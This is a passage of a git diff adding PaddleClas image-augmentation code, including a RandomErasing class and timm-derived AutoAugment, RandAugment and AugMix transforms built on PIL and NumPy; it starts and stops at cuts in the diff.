\"pixel\"" + ) + + +class RandomErasing(object): + """RandomErasing. + """ + + def __init__(self, + EPSILON=0.5, + sl=0.02, + sh=0.4, + r1=0.3, + mean=[0., 0., 0.], + attempt=100, + use_log_aspect=False, + mode='const'): + self.EPSILON = eval(EPSILON) if isinstance(EPSILON, str) else EPSILON + self.sl = eval(sl) if isinstance(sl, str) else sl + self.sh = eval(sh) if isinstance(sh, str) else sh + r1 = eval(r1) if isinstance(r1, str) else r1 + self.r1 = (math.log(r1), math.log(1 / r1)) if use_log_aspect else ( + r1, 1 / r1) + self.use_log_aspect = use_log_aspect + self.attempt = attempt + self.get_pixels = Pixels(mode, mean) + + def __call__(self, img): + if random.random() > self.EPSILON: + return img + + for _ in range(self.attempt): + area = img.shape[0] * img.shape[1] + + target_area = random.uniform(self.sl, self.sh) * area + aspect_ratio = random.uniform(*self.r1) + if self.use_log_aspect: + aspect_ratio = math.exp(aspect_ratio) + + h = int(round(math.sqrt(target_area * aspect_ratio))) + w = int(round(math.sqrt(target_area / aspect_ratio))) + + if w < img.shape[1] and h < img.shape[0]: + pixels = self.get_pixels(h, w, img.shape[2]) + x1 = random.randint(0, img.shape[0] - h) + y1 = random.randint(0, img.shape[1] - w) + if img.shape[2] == 3: + img[x1:x1 + h, y1:y1 + w, :] = pixels + else: + img[x1:x1 + h, y1:y1 + w, 0] = pixels[0] + return img + return img diff --git a/Smart_container/PaddleClas/ppcls/data/preprocess/ops/timm_autoaugment.py b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/timm_autoaugment.py new file mode 100644 index 0000000..2c9b057 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/timm_autoaugment.py @@ -0,0 +1,879 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +""" +This code implements is borrowed from Timm: https://github.com/rwightman/pytorch-image-models. +hacked together by / Copyright 2020 Ross Wightman +""" + +import random +import math +import re +from PIL import Image, ImageOps, ImageEnhance, ImageChops +import PIL +import numpy as np + +IMAGENET_DEFAULT_MEAN = (0.485, 0.456, 0.406) + +_PIL_VER = tuple([int(x) for x in PIL.__version__.split('.')[:2]]) + +_FILL = (128, 128, 128) + +# This signifies the max integer that the controller RNN could predict for the +# augmentation scheme. +_MAX_LEVEL = 10. + +_HPARAMS_DEFAULT = dict( + translate_const=250, + img_mean=_FILL, ) + +_RANDOM_INTERPOLATION = (Image.BILINEAR, Image.BICUBIC) + + +def _pil_interp(method): + if method == 'bicubic': + return Image.BICUBIC + elif method == 'lanczos': + return Image.LANCZOS + elif method == 'hamming': + return Image.HAMMING + else: + # default bilinear, do we want to allow nearest? + return Image.BILINEAR + + +def _interpolation(kwargs): + interpolation = kwargs.pop('resample', Image.BILINEAR) + if isinstance(interpolation, (list, tuple)): + return random.choice(interpolation) + else: + return interpolation + + +def _check_args_tf(kwargs): + if 'fillcolor' in kwargs and _PIL_VER < (5, 0): + kwargs.pop('fillcolor') + kwargs['resample'] = _interpolation(kwargs) + + +def shear_x(img, factor, **kwargs): + _check_args_tf(kwargs) + return img.transform(img.size, Image.AFFINE, (1, factor, 0, 0, 1, 0), + **kwargs) + + +def shear_y(img, factor, **kwargs): + _check_args_tf(kwargs) + return img.transform(img.size, Image.AFFINE, (1, 0, 0, factor, 1, 0), + **kwargs) + + +def translate_x_rel(img, pct, **kwargs): + pixels = pct * img.size[0] + _check_args_tf(kwargs) + return img.transform(img.size, Image.AFFINE, (1, 0, pixels, 0, 1, 0), + **kwargs) + + +def translate_y_rel(img, pct, **kwargs): + pixels = pct * img.size[1] + _check_args_tf(kwargs) + return img.transform(img.size, Image.AFFINE, (1, 0, 0, 0, 1, pixels), + **kwargs) + + +def translate_x_abs(img, pixels, **kwargs): + _check_args_tf(kwargs) + return img.transform(img.size, Image.AFFINE, (1, 0, pixels, 0, 1, 0), + **kwargs) + + +def translate_y_abs(img, pixels, **kwargs): + _check_args_tf(kwargs) + return img.transform(img.size, Image.AFFINE, (1, 0, 0, 0, 1, pixels), + **kwargs) + + +def rotate(img, degrees, **kwargs): + _check_args_tf(kwargs) + if _PIL_VER >= (5, 2): + return img.rotate(degrees, **kwargs) + elif _PIL_VER >= (5, 0): + w, h = img.size + post_trans = (0, 0) + rotn_center = (w / 2.0, h / 2.0) + angle = -math.radians(degrees) + matrix = [ + round(math.cos(angle), 15), + round(math.sin(angle), 15), + 0.0, + round(-math.sin(angle), 15), + round(math.cos(angle), 15), + 0.0, + ] + + def transform(x, y, matrix): + (a, b, c, d, e, f) = matrix + return a * x + b * y + c, d * x + e * y + f + + matrix[2], matrix[5] = transform(-rotn_center[0] - post_trans[0], + -rotn_center[1] - post_trans[1], + matrix) + matrix[2] += rotn_center[0] + matrix[5] += rotn_center[1] + return img.transform(img.size, Image.AFFINE, matrix, **kwargs) + else: + return img.rotate(degrees, resample=kwargs['resample']) + + +def auto_contrast(img, **__): + return ImageOps.autocontrast(img) + + +def invert(img, **__): + return ImageOps.invert(img) + + +def equalize(img, **__): + return ImageOps.equalize(img) + + +def solarize(img, thresh, **__): + return ImageOps.solarize(img, thresh) + + +def solarize_add(img, add, thresh=128, **__): + lut = [] + for i in range(256): + if i < thresh: + lut.append(min(255, i + add)) + else: + lut.append(i) + if img.mode in ("L", "RGB"): + if img.mode == "RGB" and len(lut) == 256: + lut = lut + lut + lut + return img.point(lut) + else: + return img + + +def posterize(img, bits_to_keep, **__): + if bits_to_keep >= 8: + return img + return ImageOps.posterize(img, bits_to_keep) + + +def contrast(img, factor, **__): + return ImageEnhance.Contrast(img).enhance(factor) + + +def color(img, factor, **__): + return ImageEnhance.Color(img).enhance(factor) + + +def brightness(img, factor, **__): + return ImageEnhance.Brightness(img).enhance(factor) + + +def sharpness(img, factor, **__): + return ImageEnhance.Sharpness(img).enhance(factor) + + +def _randomly_negate(v): + """With 50% prob, negate the value""" + return -v if random.random() > 0.5 else v + + +def _rotate_level_to_arg(level, _hparams): + # range [-30, 30] + level = (level / _MAX_LEVEL) * 30. + level = _randomly_negate(level) + return level, + + +def _enhance_level_to_arg(level, _hparams): + # range [0.1, 1.9] + return (level / _MAX_LEVEL) * 1.8 + 0.1, + + +def _enhance_increasing_level_to_arg(level, _hparams): + # the 'no change' level is 1.0, moving away from that towards 0. or 2.0 increases the enhancement blend + # range [0.1, 1.9] + level = (level / _MAX_LEVEL) * .9 + level = 1.0 + _randomly_negate(level) + return level, + + +def _shear_level_to_arg(level, _hparams): + # range [-0.3, 0.3] + level = (level / _MAX_LEVEL) * 0.3 + level = _randomly_negate(level) + return level, + + +def _translate_abs_level_to_arg(level, hparams): + translate_const = hparams['translate_const'] + level = (level / _MAX_LEVEL) * float(translate_const) + level = _randomly_negate(level) + return level, + + +def _translate_rel_level_to_arg(level, hparams): + # default range [-0.45, 0.45] + translate_pct = hparams.get('translate_pct', 0.45) + level = (level / _MAX_LEVEL) * translate_pct + level = _randomly_negate(level) + return level, + + +def _posterize_level_to_arg(level, _hparams): + # As per Tensorflow TPU EfficientNet impl + # range [0, 4], 'keep 0 up to 4 MSB of original image' + # intensity/severity of augmentation decreases with level + return int((level / _MAX_LEVEL) * 4), + + +def _posterize_increasing_level_to_arg(level, hparams): + # As per Tensorflow models research and UDA impl + # range [4, 0], 'keep 4 down to 0 MSB of original image', + # intensity/severity of augmentation increases with level + return 4 - _posterize_level_to_arg(level, hparams)[0], + + +def _posterize_original_level_to_arg(level, _hparams): + # As per original AutoAugment paper description + # range [4, 8], 'keep 4 up to 8 MSB of image' + # intensity/severity of augmentation decreases with level + return int((level / _MAX_LEVEL) * 4) + 4, + + +def _solarize_level_to_arg(level, _hparams): + # range [0, 256] + # intensity/severity of augmentation decreases with level + return int((level / _MAX_LEVEL) * 256), + + +def _solarize_increasing_level_to_arg(level, _hparams): + # range [0, 256] + # intensity/severity of augmentation increases with level + return 256 - _solarize_level_to_arg(level, _hparams)[0], + + +def _solarize_add_level_to_arg(level, _hparams): + # range [0, 110] + return int((level / _MAX_LEVEL) * 110), + + +LEVEL_TO_ARG = { + 'AutoContrast': None, + 'Equalize': None, + 'Invert': None, + 'Rotate': _rotate_level_to_arg, + # There are several variations of the posterize level scaling in various Tensorflow/Google repositories/papers + 'Posterize': _posterize_level_to_arg, + 'PosterizeIncreasing': _posterize_increasing_level_to_arg, + 'PosterizeOriginal': _posterize_original_level_to_arg, + 'Solarize': _solarize_level_to_arg, + 'SolarizeIncreasing': _solarize_increasing_level_to_arg, + 'SolarizeAdd': _solarize_add_level_to_arg, + 'Color': _enhance_level_to_arg, + 'ColorIncreasing': _enhance_increasing_level_to_arg, + 'Contrast': _enhance_level_to_arg, + 'ContrastIncreasing': _enhance_increasing_level_to_arg, + 'Brightness': _enhance_level_to_arg, + 'BrightnessIncreasing': _enhance_increasing_level_to_arg, + 'Sharpness': _enhance_level_to_arg, + 'SharpnessIncreasing': _enhance_increasing_level_to_arg, + 'ShearX': _shear_level_to_arg, + 'ShearY': _shear_level_to_arg, + 'TranslateX': _translate_abs_level_to_arg, + 'TranslateY': _translate_abs_level_to_arg, + 'TranslateXRel': _translate_rel_level_to_arg, + 'TranslateYRel': _translate_rel_level_to_arg, +} + +NAME_TO_OP = { + 'AutoContrast': auto_contrast, + 'Equalize': equalize, + 'Invert': invert, + 'Rotate': rotate, + 'Posterize': posterize, + 'PosterizeIncreasing': posterize, + 'PosterizeOriginal': posterize, + 'Solarize': solarize, + 'SolarizeIncreasing': solarize, + 'SolarizeAdd': solarize_add, + 'Color': color, + 'ColorIncreasing': color, + 'Contrast': contrast, + 'ContrastIncreasing': contrast, + 'Brightness': brightness, + 'BrightnessIncreasing': brightness, + 'Sharpness': sharpness, + 'SharpnessIncreasing': sharpness, + 'ShearX': shear_x, + 'ShearY': shear_y, + 'TranslateX': translate_x_abs, + 'TranslateY': translate_y_abs, + 'TranslateXRel': translate_x_rel, + 'TranslateYRel': translate_y_rel, +} + + +class AugmentOp(object): + def __init__(self, name, prob=0.5, magnitude=10, hparams=None): + hparams = hparams or _HPARAMS_DEFAULT + self.aug_fn = NAME_TO_OP[name] + self.level_fn = LEVEL_TO_ARG[name] + self.prob = prob + self.magnitude = magnitude + self.hparams = hparams.copy() + self.kwargs = dict( + fillcolor=hparams['img_mean'] if 'img_mean' in hparams else _FILL, + resample=hparams['interpolation'] + if 'interpolation' in hparams else _RANDOM_INTERPOLATION, ) + + # If magnitude_std is > 0, we introduce some randomness + # in the usually fixed policy and sample magnitude from a normal distribution + # with mean `magnitude` and std-dev of `magnitude_std`. + # NOTE This is my own hack, being tested, not in papers or reference impls. + self.magnitude_std = self.hparams.get('magnitude_std', 0) + + def __call__(self, img): + if self.prob < 1.0 and random.random() > self.prob: + return img + magnitude = self.magnitude + if self.magnitude_std and self.magnitude_std > 0: + magnitude = random.gauss(magnitude, self.magnitude_std) + magnitude = min(_MAX_LEVEL, max(0, magnitude)) # clip to valid range + level_args = self.level_fn( + magnitude, self.hparams) if self.level_fn is not None else tuple() + return self.aug_fn(img, *level_args, **self.kwargs) + + +def auto_augment_policy_v0(hparams): + # ImageNet v0 policy from TPU EfficientNet impl, cannot find a paper reference. + policy = [ + [('Equalize', 0.8, 1), ('ShearY', 0.8, 4)], + [('Color', 0.4, 9), ('Equalize', 0.6, 3)], + [('Color', 0.4, 1), ('Rotate', 0.6, 8)], + [('Solarize', 0.8, 3), ('Equalize', 0.4, 7)], + [('Solarize', 0.4, 2), ('Solarize', 0.6, 2)], + [('Color', 0.2, 0), ('Equalize', 0.8, 8)], + [('Equalize', 0.4, 8), ('SolarizeAdd', 0.8, 3)], + [('ShearX', 0.2, 9), ('Rotate', 0.6, 8)], + [('Color', 0.6, 1), ('Equalize', 1.0, 2)], + [('Invert', 0.4, 9), ('Rotate', 0.6, 0)], + [('Equalize', 1.0, 9), ('ShearY', 0.6, 3)], + [('Color', 0.4, 7), ('Equalize', 0.6, 0)], + [('Posterize', 0.4, 6), ('AutoContrast', 0.4, 7)], + [('Solarize', 0.6, 8), ('Color', 0.6, 9)], + [('Solarize', 0.2, 4), ('Rotate', 0.8, 9)], + [('Rotate', 1.0, 7), ('TranslateYRel', 0.8, 9)], + [('ShearX', 0.0, 0), ('Solarize', 0.8, 4)], + [('ShearY', 0.8, 0), ('Color', 0.6, 4)], + [('Color', 1.0, 0), ('Rotate', 0.6, 2)], + [('Equalize', 0.8, 4), ('Equalize', 0.0, 8)], + [('Equalize', 1.0, 4), ('AutoContrast', 0.6, 2)], + [('ShearY', 0.4, 7), ('SolarizeAdd', 0.6, 7)], + [('Posterize', 0.8, 2), ('Solarize', 0.6, 10) + ], # This results in black image with Tpu posterize + [('Solarize', 0.6, 8), ('Equalize', 0.6, 1)], + [('Color', 0.8, 6), ('Rotate', 0.4, 5)], + ] + pc = [[AugmentOp(*a, hparams=hparams) for a in sp] for sp in policy] + return pc + + +def auto_augment_policy_v0r(hparams): + # ImageNet v0 policy from TPU EfficientNet impl, with variation of Posterize used + # in Google research implementation (number of bits discarded increases with magnitude) + policy = [ + [('Equalize', 0.8, 1), ('ShearY', 0.8, 4)], + [('Color', 0.4, 9), ('Equalize', 0.6, 3)], + [('Color', 0.4, 1), ('Rotate', 0.6, 8)], + [('Solarize', 0.8, 3), ('Equalize', 0.4, 7)], + [('Solarize', 0.4, 2), ('Solarize', 0.6, 2)], + [('Color', 0.2, 0), ('Equalize', 0.8, 8)], + [('Equalize', 0.4, 8), ('SolarizeAdd', 0.8, 3)], + [('ShearX', 0.2, 9), ('Rotate', 0.6, 8)], + [('Color', 0.6, 1), ('Equalize', 1.0, 2)], + [('Invert', 0.4, 9), ('Rotate', 0.6, 0)], + [('Equalize', 1.0, 9), ('ShearY', 0.6, 3)], + [('Color', 0.4, 7), ('Equalize', 0.6, 0)], + [('PosterizeIncreasing', 0.4, 6), ('AutoContrast', 0.4, 7)], + [('Solarize', 0.6, 8), ('Color', 0.6, 9)], + [('Solarize', 0.2, 4), ('Rotate', 0.8, 9)], + [('Rotate', 1.0, 7), ('TranslateYRel', 0.8, 9)], + [('ShearX', 0.0, 0), ('Solarize', 0.8, 4)], + [('ShearY', 0.8, 0), ('Color', 0.6, 4)], + [('Color', 1.0, 0), ('Rotate', 0.6, 2)], + [('Equalize', 0.8, 4), ('Equalize', 0.0, 8)], + [('Equalize', 1.0, 4), ('AutoContrast', 0.6, 2)], + [('ShearY', 0.4, 7), ('SolarizeAdd', 0.6, 7)], + [('PosterizeIncreasing', 0.8, 2), ('Solarize', 0.6, 10)], + [('Solarize', 0.6, 8), ('Equalize', 0.6, 1)], + [('Color', 0.8, 6), ('Rotate', 0.4, 5)], + ] + pc = [[AugmentOp(*a, hparams=hparams) for a in sp] for sp in policy] + return pc + + +def auto_augment_policy_original(hparams): + # ImageNet policy from https://arxiv.org/abs/1805.09501 + policy = [ + [('PosterizeOriginal', 0.4, 8), ('Rotate', 0.6, 9)], + [('Solarize', 0.6, 5), ('AutoContrast', 0.6, 5)], + [('Equalize', 0.8, 8), ('Equalize', 0.6, 3)], + [('PosterizeOriginal', 0.6, 7), ('PosterizeOriginal', 0.6, 6)], + [('Equalize', 0.4, 7), ('Solarize', 0.2, 4)], + [('Equalize', 0.4, 4), ('Rotate', 0.8, 8)], + [('Solarize', 0.6, 3), ('Equalize', 0.6, 7)], + [('PosterizeOriginal', 0.8, 5), ('Equalize', 1.0, 2)], + [('Rotate', 0.2, 3), ('Solarize', 0.6, 8)], + [('Equalize', 0.6, 8), ('PosterizeOriginal', 0.4, 6)], + [('Rotate', 0.8, 8), ('Color', 0.4, 0)], + [('Rotate', 0.4, 9), ('Equalize', 0.6, 2)], + [('Equalize', 0.0, 7), ('Equalize', 0.8, 8)], + [('Invert', 0.6, 4), ('Equalize', 1.0, 8)], + [('Color', 0.6, 4), ('Contrast', 1.0, 8)], + [('Rotate', 0.8, 8), ('Color', 1.0, 2)], + [('Color', 0.8, 8), ('Solarize', 0.8, 7)], + [('Sharpness', 0.4, 7), ('Invert', 0.6, 8)], + [('ShearX', 0.6, 5), ('Equalize', 1.0, 9)], + [('Color', 0.4, 0), ('Equalize', 0.6, 3)], + [('Equalize', 0.4, 7), ('Solarize', 0.2, 4)], + [('Solarize', 0.6, 5), ('AutoContrast', 0.6, 5)], + [('Invert', 0.6, 4), ('Equalize', 1.0, 8)], + [('Color', 0.6, 4), ('Contrast', 1.0, 8)], + [('Equalize', 0.8, 8), ('Equalize', 0.6, 3)], + ] + pc = [[AugmentOp(*a, hparams=hparams) for a in sp] for sp in policy] + return pc + + +def auto_augment_policy_originalr(hparams): + # ImageNet policy from https://arxiv.org/abs/1805.09501 with research posterize variation + policy = [ + [('PosterizeIncreasing', 0.4, 8), ('Rotate', 0.6, 9)], + [('Solarize', 0.6, 5), ('AutoContrast', 0.6, 5)], + [('Equalize', 0.8, 8), ('Equalize', 0.6, 3)], + [('PosterizeIncreasing', 0.6, 7), ('PosterizeIncreasing', 0.6, 6)], + [('Equalize', 0.4, 7), ('Solarize', 0.2, 4)], + [('Equalize', 0.4, 4), ('Rotate', 0.8, 8)], + [('Solarize', 0.6, 3), ('Equalize', 0.6, 7)], + [('PosterizeIncreasing', 0.8, 5), ('Equalize', 1.0, 2)], + [('Rotate', 0.2, 3), ('Solarize', 0.6, 8)], + [('Equalize', 0.6, 8), ('PosterizeIncreasing', 0.4, 6)], + [('Rotate', 0.8, 8), ('Color', 0.4, 0)], + [('Rotate', 0.4, 9), ('Equalize', 0.6, 2)], + [('Equalize', 0.0, 7), ('Equalize', 0.8, 8)], + [('Invert', 0.6, 4), ('Equalize', 1.0, 8)], + [('Color', 0.6, 4), ('Contrast', 1.0, 8)], + [('Rotate', 0.8, 8), ('Color', 1.0, 2)], + [('Color', 0.8, 8), ('Solarize', 0.8, 7)], + [('Sharpness', 0.4, 7), ('Invert', 0.6, 8)], + [('ShearX', 0.6, 5), ('Equalize', 1.0, 9)], + [('Color', 0.4, 0), ('Equalize', 0.6, 3)], + [('Equalize', 0.4, 7), ('Solarize', 0.2, 4)], + [('Solarize', 0.6, 5), ('AutoContrast', 0.6, 5)], + [('Invert', 0.6, 4), ('Equalize', 1.0, 8)], + [('Color', 0.6, 4), ('Contrast', 1.0, 8)], + [('Equalize', 0.8, 8), ('Equalize', 0.6, 3)], + ] + pc = [[AugmentOp(*a, hparams=hparams) for a in sp] for sp in policy] + return pc + + +def auto_augment_policy(name='v0', hparams=None): + hparams = hparams or _HPARAMS_DEFAULT + if name == 'original': + return auto_augment_policy_original(hparams) + elif name == 'originalr': + return auto_augment_policy_originalr(hparams) + elif name == 'v0': + return auto_augment_policy_v0(hparams) + elif name == 'v0r': + return auto_augment_policy_v0r(hparams) + else: + assert False, 'Unknown AA policy (%s)' % name + + +class AutoAugment(object): + def __init__(self, policy): + self.policy = policy + + def __call__(self, img): + sub_policy = random.choice(self.policy) + for op in sub_policy: + img = op(img) + return img + + +def auto_augment_transform(config_str, hparams): + """ + Create a AutoAugment transform + + :param config_str: String defining configuration of auto augmentation. Consists of multiple sections separated by + dashes ('-'). The first section defines the AutoAugment policy (one of 'v0', 'v0r', 'original', 'originalr'). + The remaining sections, not order sepecific determine + 'mstd' - float std deviation of magnitude noise applied + Ex 'original-mstd0.5' results in AutoAugment with original policy, magnitude_std 0.5 + + :param hparams: Other hparams (kwargs) for the AutoAugmentation scheme + + :return: A callable Transform Op + """ + config = config_str.split('-') + policy_name = config[0] + config = config[1:] + for c in config: + cs = re.split(r'(\d.*)', c) + if len(cs) < 2: + continue + key, val = cs[:2] + if key == 'mstd': + # noise param injected via hparams for now + hparams.setdefault('magnitude_std', float(val)) + else: + assert False, 'Unknown AutoAugment config section' + aa_policy = auto_augment_policy(policy_name, hparams=hparams) + return AutoAugment(aa_policy) + + +_RAND_TRANSFORMS = [ + 'AutoContrast', + 'Equalize', + 'Invert', + 'Rotate', + 'Posterize', + 'Solarize', + 'SolarizeAdd', + 'Color', + 'Contrast', + 'Brightness', + 'Sharpness', + 'ShearX', + 'ShearY', + 'TranslateXRel', + 'TranslateYRel', + #'Cutout' # NOTE I've implement this as random erasing separately +] + +_RAND_INCREASING_TRANSFORMS = [ + 'AutoContrast', + 'Equalize', + 'Invert', + 'Rotate', + 'PosterizeIncreasing', + 'SolarizeIncreasing', + 'SolarizeAdd', + 'ColorIncreasing', + 'ContrastIncreasing', + 'BrightnessIncreasing', + 'SharpnessIncreasing', + 'ShearX', + 'ShearY', + 'TranslateXRel', + 'TranslateYRel', + #'Cutout' # NOTE I've implement this as random erasing separately +] + +# These experimental weights are based loosely on the relative improvements mentioned in paper. +# They may not result in increased performance, but could likely be tuned to so. +_RAND_CHOICE_WEIGHTS_0 = { + 'Rotate': 0.3, + 'ShearX': 0.2, + 'ShearY': 0.2, + 'TranslateXRel': 0.1, + 'TranslateYRel': 0.1, + 'Color': .025, + 'Sharpness': 0.025, + 'AutoContrast': 0.025, + 'Solarize': .005, + 'SolarizeAdd': .005, + 'Contrast': .005, + 'Brightness': .005, + 'Equalize': .005, + 'Posterize': 0, + 'Invert': 0, +} + + +def _select_rand_weights(weight_idx=0, transforms=None): + transforms = transforms or _RAND_TRANSFORMS + assert weight_idx == 0 # only one set of weights currently + rand_weights = _RAND_CHOICE_WEIGHTS_0 + probs = [rand_weights[k] for k in transforms] + probs /= np.sum(probs) + return probs + + +def rand_augment_ops(magnitude=10, hparams=None, transforms=None): + hparams = hparams or _HPARAMS_DEFAULT + transforms = transforms or _RAND_TRANSFORMS + return [ + AugmentOp( + name, prob=0.5, magnitude=magnitude, hparams=hparams) + for name in transforms + ] + + +class RandAugment(object): + def __init__(self, ops, num_layers=2, choice_weights=None): + self.ops = ops + self.num_layers = num_layers + self.choice_weights = choice_weights + + def __call__(self, img): + # no replacement when using weighted choice + ops = np.random.choice( + self.ops, + self.num_layers, + replace=self.choice_weights is None, + p=self.choice_weights) + for op in ops: + img = op(img) + return img + + +def rand_augment_transform(config_str, hparams): + """ + Create a RandAugment transform + + :param config_str: String defining configuration of random augmentation. Consists of multiple sections separated by + dashes ('-'). The first section defines the specific variant of rand augment (currently only 'rand'). The remaining + sections, not order sepecific determine + 'm' - integer magnitude of rand augment + 'n' - integer num layers (number of transform ops selected per image) + 'w' - integer probabiliy weight index (index of a set of weights to influence choice of op) + 'mstd' - float std deviation of magnitude noise applied + 'inc' - integer (bool), use augmentations that increase in severity with magnitude (default: 0) + Ex 'rand-m9-n3-mstd0.5' results in RandAugment with magnitude 9, num_layers 3, magnitude_std 0.5 + 'rand-mstd1-w0' results in magnitude_std 1.0, weights 0, default magnitude of 10 and num_layers 2 + + :param hparams: Other hparams (kwargs) for the RandAugmentation scheme + + :return: A callable Transform Op + """ + magnitude = _MAX_LEVEL # default to _MAX_LEVEL for magnitude (currently 10) + num_layers = 2 # default to 2 ops per image + weight_idx = None # default to no probability weights for op choice + transforms = _RAND_TRANSFORMS + config = config_str.split('-') + assert config[0] == 'rand' + config = config[1:] + for c in config: + cs = re.split(r'(\d.*)', c) + if len(cs) < 2: + continue + key, val = cs[:2] + if key == 'mstd': + # noise param injected via hparams for now + hparams.setdefault('magnitude_std', float(val)) + elif key == 'inc': + if bool(val): + transforms = _RAND_INCREASING_TRANSFORMS + elif key == 'm': + magnitude = int(val) + elif key == 'n': + num_layers = int(val) + elif key == 'w': + weight_idx = int(val) + else: + assert False, 'Unknown RandAugment config section' + ra_ops = rand_augment_ops( + magnitude=magnitude, hparams=hparams, transforms=transforms) + choice_weights = None if weight_idx is None else _select_rand_weights( + weight_idx) + return RandAugment(ra_ops, num_layers, choice_weights=choice_weights) + + +_AUGMIX_TRANSFORMS = [ + 'AutoContrast', + 'ColorIncreasing', # not in paper + 'ContrastIncreasing', # not in paper + 'BrightnessIncreasing', # not in paper + 'SharpnessIncreasing', # not in paper + 'Equalize', + 'Rotate', + 'PosterizeIncreasing', + 'SolarizeIncreasing', + 'ShearX', + 'ShearY', + 'TranslateXRel', + 'TranslateYRel', +] + + +def augmix_ops(magnitude=10, hparams=None, transforms=None): + hparams = hparams or _HPARAMS_DEFAULT + transforms = transforms or _AUGMIX_TRANSFORMS + return [ + AugmentOp( + name, prob=1.0, magnitude=magnitude, hparams=hparams) + for name in transforms + ] + + +class AugMixAugment(object): + """ AugMix Transform + Adapted and improved from impl here: https://github.com/google-research/augmix/blob/master/imagenet.py + From paper: 'AugMix: A Simple Data Processing Method to Improve Robustness and Uncertainty - + https://arxiv.org/abs/1912.02781 + """ + + def __init__(self, ops, alpha=1., width=3, depth=-1, blended=False): + self.ops = ops + self.alpha = alpha + self.width = width + self.depth = depth + self.blended = blended # blended mode is faster but not well tested + + def _calc_blended_weights(self, ws, m): + ws = ws * m + cump = 1. + rws = [] + for w in ws[::-1]: + alpha = w / cump + cump *= (1 - alpha) + rws.append(alpha) + return np.array(rws[::-1], dtype=np.float32) + + def _apply_blended(self, img, mixing_weights, m): + # This is my first crack and implementing a slightly faster mixed augmentation. Instead + # of accumulating the mix for each chain in a Numpy array and then blending with original, + # it recomputes the blending coefficients and applies one PIL image blend per chain. + # TODO the results appear in the right ballpark but they differ by more than rounding. + img_orig = img.copy() + ws = self._calc_blended_weights(mixing_weights, m) + for w in ws: + depth = self.depth if self.depth > 0 else np.random.randint(1, 4) + ops = np.random.choice(self.ops, depth, replace=True) + img_aug = img_orig # no ops are in-place, deep copy not necessary + for op in ops: + img_aug = op(img_aug) + img = Image.blend(img, img_aug, w) + return img + + def _apply_basic(self, img, mixing_weights, m): + # This is a literal adaptation of the paper/official implementation without normalizations and + # PIL <-> Numpy conversions between every op. It is still quite CPU compute heavy compared to the + # typical augmentation transforms, could use a GPU / Kornia implementation. + img_shape = img.size[0], img.size[1], len(img.getbands()) + mixed = np.zeros(img_shape, dtype=np.float32) + for mw in mixing_weights: + depth = self.depth if self.depth > 0 else np.random.randint(1, 4) + ops = np.random.choice(self.ops, depth, replace=True) + img_aug = img # no ops are in-place, deep copy not necessary + for op in ops: + img_aug = op(img_aug) + mixed += mw * np.asarray(img_aug, dtype=np.float32) + np.clip(mixed, 0, 255., out=mixed) + mixed = Image.fromarray(mixed.astype(np.uint8)) + return Image.blend(img, mixed, m) + + def __call__(self, img): + mixing_weights = np.float32( + np.random.dirichlet([self.alpha] * self.width)) + m = np.float32(np.random.beta(self.alpha, self.alpha)) + if self.blended: + mixed = self._apply_blended(img, mixing_weights, m) + else: + mixed = self._apply_basic(img, mixing_weights, m) + return mixed + + +def augment_and_mix_transform(config_str, hparams): + """ Create AugMix transform + + :param config_str: String defining configuration of random augmentation. Consists of multiple sections separated by + dashes ('-'). The first section defines the specific variant of rand augment (currently only 'rand'). The remaining + sections, not order sepecific determine + 'm' - integer magnitude (severity) of augmentation mix (default: 3) + 'w' - integer width of augmentation chain (default: 3) + 'd' - integer depth of augmentation chain (-1 is random [1, 3], default: -1) + 'b' - integer (bool), blend each branch of chain into end result without a final blend, less CPU (default: 0) + 'mstd' - float std deviation of magnitude noise applied (default: 0) + Ex 'augmix-m5-w4-d2' results in AugMix with severity 5, chain width 4, chain depth 2 + + :param hparams: Other hparams (kwargs) for the Augmentation transforms + + :return: A callable Transform Op + """ + magnitude = 3 + width = 3 + depth = -1 + alpha = 1. + blended = False + config = config_str.split('-') + assert config[0] == 'augmix' + config = config[1:] + for c in config: + cs = re.split(r'(\d.*)', c) + if len(cs) < 2: + continue + key, val = cs[:2] + if key == 'mstd': + # noise param injected via hparams for now + hparams.setdefault('magnitude_std', float(val)) + elif key == 'm': + magnitude = int(val) + elif key == 'w': + width = int(val) + elif key == 'd': + depth = int(val) + elif key == 'a': + alpha = float(val) + elif key == 'b': + blended = bool(val) + else: + assert False, 'Unknown AugMix config section' + ops = augmix_ops(magnitude=magnitude, hparams=hparams) + return AugMixAugment( + ops, alpha=alpha, width=width, depth=depth, blended=blended) + + +class RawTimmAutoAugment(object): + """TimmAutoAugment API for PaddleClas.""" + + def __init__(self, + config_str="rand-m9-mstd0.5-inc1", + interpolation="bicubic", + img_size=224, + mean=IMAGENET_DEFAULT_MEAN): + if isinstance(img_size, (tuple, list)): + img_size_min = min(img_size) + else: + img_size_min = img_size + + aa_params = dict( + translate_const=int(img_size_min * 0.45), + img_mean=tuple([min(255, round(255 * x)) for x in mean]), ) + if interpolation and interpolation != 'random': + aa_params['interpolation'] = _pil_interp(interpolation) + if config_str.startswith('rand'): + self.augment_func = rand_augment_transform(config_str, aa_params) + elif config_str.startswith('augmix'): + aa_params['translate_pct'] = 0.3 + self.augment_func = augment_and_mix_transform(config_str, + aa_params) + elif config_str.startswith('auto'): + self.augment_func = auto_augment_transform(config_str, aa_params) + else: + raise Exception( + "ConfigError: The TimmAutoAugment Op only support RandAugment, AutoAugment, AugMix, and the config_str only starts with \"rand\", \"augmix\", \"auto\"." + ) + + def __call__(self, img): + return self.augment_func(img) diff --git a/Smart_container/PaddleClas/ppcls/data/utils/__init__.py b/Smart_container/PaddleClas/ppcls/data/utils/__init__.py new file mode 100644 index 0000000..61d5aa2 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/utils/__init__.py @@ -0,0 +1,13 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or 